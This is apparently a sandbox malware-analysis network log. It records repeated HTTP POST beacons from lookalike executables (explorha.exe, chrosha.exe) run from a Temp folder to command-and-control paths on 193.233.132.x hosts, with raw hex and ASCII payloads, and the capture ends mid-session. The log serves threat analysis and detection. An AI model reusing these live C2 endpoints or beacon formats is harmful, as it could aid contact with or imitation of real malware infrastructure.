                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      512192.168.2.550356193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:20.041852951 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:20.289483070 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      513192.168.2.550357193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:20.530364037 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:20.782867908 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      514192.168.2.550358193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:20.648312092 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:20.892092943 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      515192.168.2.550359193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.036916971 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.289412022 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      516192.168.2.550360193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.142071009 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.390985012 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      517192.168.2.550361193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.657546043 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.905548096 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      518192.168.2.550362193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.740859032 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:21.984735012 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      519192.168.2.550364193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:22.159617901 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:22.412725925 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      520192.168.2.550365193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:22.239408016 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:22.492142916 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      521192.168.2.550366193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:22.776021957 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.024703979 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      522192.168.2.550367193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:22.858995914 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.107474089 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      523192.168.2.550368193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.276231050 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.528750896 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      524192.168.2.550369193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.361321926 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.614545107 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      525192.168.2.550370193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.883049965 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.126471996 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      526192.168.2.550371193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:23.973814964 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.215981007 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      527192.168.2.550372193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.372375011 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.619539976 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      528192.168.2.550373193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:24.467001915 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
